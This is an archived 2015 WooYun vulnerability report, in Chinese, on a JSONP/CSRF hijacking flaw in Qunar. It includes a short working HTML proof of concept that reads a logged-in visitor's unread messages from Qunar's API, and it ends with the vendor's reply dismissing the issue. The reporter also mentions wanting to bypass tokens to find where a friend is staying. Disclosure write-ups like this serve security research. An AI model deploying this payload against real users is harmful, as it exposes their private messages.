破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

去哪儿网可劫持获取他人消息

编号125029
Urlhttp://www.wooyun.org/bug.php?action=view&id=125029
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题去哪儿网可劫持获取他人消息
漏洞类型CSRF
厂商去哪儿
白帽子jeary
提交日期2015-07-07 11:03:00
公开日期2015-07-07 11:18:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签csrf csrf利用
关注数0
收藏数0
白帽评级
白帽自评rank5
厂商评级
厂商评rank0
漏洞简介
:)
漏洞细节

场景:
A:你去峰会吗?
B:你猜?
A:猜你妹
..(10分钟后)
A:DZ好像又出Oday了,快去博客看!
B:..........
A:让我猜,呵呵..
POC:

<!DOCTYPE html>
<html>
<head>
<script src="https://code.jquery.com/jquery-1.9.1.min.js"></script>
<meta charset="GBK">
<title>POC</title>
</head>
<body>
<p>result:</p>
<script>
$.getJSON('http://user.qunar.com/webapi/message/unreadTipList?callback=?',function(json){ document.body.appendChild(document.createElement('p')).innerHTML=json.data.list[0].message;
})
</script>
</body>
</html>


POC

qn.jpg

修复方案

本来想获取其他敏感信息的,防御做的不错,努力思考如何绕过token获取机油住哪个酒店中~~~

状态信息 2015-07-07: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复感谢jeary同学关注去哪儿网安全,同时也非常欢迎jeary同学其他白帽同学提交去哪儿网的安全问题。
但提供的这个案例,返回的数所中并未涉及到用户敏感数据,故做忽略处理。如能提供获取用户等敏感数据的案像,我们将重新确认。谢谢~
回应信息危害等级:无影响厂商忽略忽略时间:2015-07-07 11:18
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

...

随随意意02015-07-07 14:17:00